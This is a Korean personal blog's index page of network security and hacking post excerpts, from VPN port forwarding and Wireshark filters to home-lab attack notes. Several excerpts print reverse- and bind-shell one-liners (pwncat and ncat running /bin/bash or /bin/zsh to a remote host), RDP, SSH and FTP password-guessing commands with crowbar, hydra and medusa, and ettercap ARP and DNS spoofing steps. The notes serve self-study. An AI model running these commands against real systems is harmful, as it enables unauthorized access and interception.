본문 바로가기

Tried. Failed. Logged.

728x90

🔒정보보안/네트워크 보안25

네트워크 보안 - Mullvad VPN 포트포워딩으로 웹 서버 외부에서 접속 Mullvad VPN 사이트: 계정 > 장치 탭에서 내 장치 확인 주소: https://mullvad.net/ko/account/#/devices 내 장치에서 "포트 추가" 클릭 포트포워딩 설정 배정된 포트 번호 확인 나라-도시-포트번호 형식이며 뒤에 숫자 번호가 지정받은 내 포트 번호이다. Mullvad VPN 프로그램에서 톱니바퀴(설정) 클릭 "VPN 설정" 클릭 터널 프로토콜 항목에서 "OpenVPN"을 선택 반드시 VPN 서버의 연결된 위치가 포트포워딩 페이지에서 설정한 위치랑 일치하는지 확인 Mullvad VPN 사이트에서 포트 접속 확인하기 주소: https://mullvad.net/ko/check 자신의 IPv4 주소를 우선 확인 바로 하단에 "포트 확인" 탭으로 들어가 방금 전에 확인한 포.. 2023. 3. 19.

네트워크 해킹 - pwncat 리버스쉘 명령어 pip 설치 명령어 pip install pwncat victim(클라이언트)이 공격자(서버) 접속을 위한 설치 명령어 sudo pip install pwncat-cs 위는 공격자가 python3 -m pwncat 명령어를 쓰기 위한 설치 명령어 TCP Reverse shell(클라이언트) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10초마다 재연결 시도 공격자 리버스쉘 서버 오픈 python3 -m pwncat -lp 4444 pwncat 프롬프트 명령어 / 단축키 sessions: 연결된 victim들 확인 sessions {ID}: 상호작용 하려는 victi.. 2023. 3. 16.

네트워크 보안 - 아이피로 악의적인 피해 사례 검색(criminalip.io) https://www.criminalip.io/ko Cybersecurity Search Engine | Criminal IP Criminal IP is a Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform to find everything in Cybersecurity with impressive amount data capacities, API speed, and price. www.criminalip.io 2023. 3. 12.

네트워크 보안 - 와이어샤크(Wireshark) SSL handshake 필터 Useful Wireshark filter for analysis of SSL Traffic. Client Hello: ssl.handshake.type == 1 Server Hello: ssl.handshake.type == 2 NewSessionTicket: ssl.handshake.type == 4 Certificate: ssl.handshake.type == 11 CertificateRequest ssl.handshake.type == 13 ServerHelloDone: ssl.handshake.type == 14 Note: “ServerHellpDone” means full-handshake TLS session. Cipher Suites: ssl.handshake.ciphersuite I fo.. 2022. 9. 22.

네트워크 보안 - VPN보다 강력한 차세대 보안솔루션(SPN) VPN 방식 VPN 클라이언트가 암호화한 데이터를 VPN 서버에게 전달하면 ISP가 데이터를 알아볼 수가 없다. 하지만 VPN 서버에는 암호화를 복호화할 수 있는 키가 존재하기 때문에 언제든 사용자의 개인정보호를 로깅하는게 가능하므로 100% 신뢰하기 어렵다. SPN(Safing Privacy Network) 방식 마치 Tor 네트워크처럼 노드를 여러 개를 거쳐서(멀티홉) 서버에 데이터를 요청하는 방식 당연히 노드들과 연결 관계를 형성하면 노드들은 주변에 다른 노드들(수신, 송신)의 정보만 가지고 있지 소스와 데스티네이션의 정보와 데이터 정보는 암호화가 되어 확인할 수 없다. Portmaster의 SPN 시연 영상 https://youtu.be/p3tjNmFKrDk 출처: https://safing.io.. 2022. 8. 28.

네트워크 해킹 - 맥(MacOS) 리버스 쉘(Reverse Shell), 바인드 쉘(Bind Shell) 연결 실습 환경 공격자 환경: Ubuntu IP: 192.168.0.5 공격 대상 MacOS(10.13.6) IP: 192.168.0.6 * 맥에서는 nc 명령어가 되지 않는 문제로 대신 ncat 명령어를 사용하였다. 리버스 쉘 공격자가 직접 서버를 여는 방식으로 공격 대상자의 막혀있는 방화벽(아웃바인드)을 우회할 수 있다. 공격자(Ubuntu) nc -lvp 4444 공격 대상(MacOS) ncat 192.168.0.5 4444 -e /bin/zsh 바인드 쉘 공격 대상자가 직접 서버를 여는 형태이다. 공격 대상(MacOS) ncat -lvp 4444 -e /bin/zsh 공격자(Ubuntu) nc 192.168.0.6 4444 출처: https://hobbylists.tistory.com/entry/kal.. 2022. 8. 5.

네트워크 해킹 - tor 작동 원리 다음은 Tor 클라이언트 A (원본)에서 Tor 서버 B, C를 차례로 거쳐 목적지 D (일반 Web 서버 등)에 이르는 경우의 설명이다. 1. A는 미리 얻고 있는 디렉토리 목록에서 임의로 B와 C를 선택한다. 2. A는 B에 대해 가상 회선 연결 요청, AB 사이의 암호화 통신을 위한 세션 키를 교환하기 위한 정보와 함께 전달한다. 3. B는 A에 가상 회선 연결 수락과 함께 세션 키 교환을 위한 정보를 전송한다. 4. AB 사이에 전단까지 얻은 세션 키는 암호화 통신로 얻을 수 있다. 이후 AB 간의 통신이 암호화 통신 경로를 사용하여 행해진다. 5. A는 B에 대해 "B가 C에 대한 가상 회선 연결의 요구를 제출하는 것"을 요구하는 전송한다. 6. B는 C에 대해 가상 회선 연결 요청, BC 사이.. 2022. 8. 1.

리눅스 - ssh 연결시 tor socks5 경유하기 필요 패키지 설치 apt install tor apt install connect # nc(netcat)이 설치되어 있다면 무시 설치 후에는 tor를 실행시켜준다. 사용 명령어 connect ProxyCommand 사용 방법 ssh -o "ProxyCommand connect -5 -S localhost:9050 %h %p" user@123.123.123.123 nc ProxyCommand 사용 방법 ssh -o ProxyCommand="nc -x localhost:9050 %h %p" user@123.123.123.123 프록시 성공 확인 명령어 Windows netstat -n | findstr 22 Linux/macOS who am i 위의 명령어 실행시에 내 접속 아이피가 tor IP 주소로 뜬다.. 2022. 8. 1.

네트워크 해킹 - ettercap의 arp 스푸핑을 이용해 dns 스푸핑하기 우선 ettercap 켠다. 그리고 eth0에 접근 인터페이스 상단에 보면 돋보기 모양이 있는데 이를 클릭해 주변에 존재하는 호스트들을 잡는다. 그리고 확인된 아이피 어드레스들 중 라우터(공유기)로 추정되는 것은 Target 1으로 지정하고, 스니핑(도청)을 당하고자하는 타겟은 Target 2로 지정 이제 다시 인터페이스에 상단 맨 오른쪽에 지구본 모양이 있는데 이를 클릭해서 ARP poising...을 누른 다음 이런 체크 박스 창이 뜨게되면 사진과 같이 "Sniff remote connections."를 체크하고 OK를 눌러 ARP 스푸핑을 시작한다. 이제 피해자의 PC를 조작한다. cmd에 들어가서 "arp -a"를 실행시켜주게 되면 (ARP 테이블 확인 명령어) 공유기의 물리적 주소가 아래의 다른.. 2021. 12. 22.

네트워크 해킹 - Tor ProxyChains 로컬 프록시 설정 https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [설치 및 설정] # tor 설치 sudo apt install tor # proxychains 설정 파일 수정하기 sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15.

네트워크 해킹 - rdp 사전 공격 재택근무가 잦아진 요즘 RDP(Remote Desktop Protocol)를 사용하는 유저들이 꽤나 많아졌다. 이런 시대의 흐름을 맞춰서 RDP를 공격하는 다양한 공격 도구들이 생겨났는데, 그중 하나가 사전 공격을 도와주는 Crowbar가 있다. 도구를 사용하기 이전에 리눅스에 freerdp가 설치되어있어야 함 sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer [사용 명령어] ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist hydra로도 가능하다. [사용 명.. 2021. 12. 14.

네트워크 해킹 - medua, 무차별 대입 공격 도구 https://www.kali.org/tools/medusa/ medusa | Kali Linux Tools www.kali.org 얘도 hydra과 같은 대입 공격 도구이다. 사용 방법) medusa -h 호스트 -u 유저 -P 사전(passwords.txt) -M 모드(ssh|ftp) ssh 서버를 대상으로 써봤는데 잘 된다. example) medusa -h 192.168.0.5 -u root -p qwer1234 -M ssh medusa -h 192.168.0.5 -u root -P passwords.txt -M ftp 2021. 11. 22.

이전 1 2 3 다음

728x90

티스토리툴바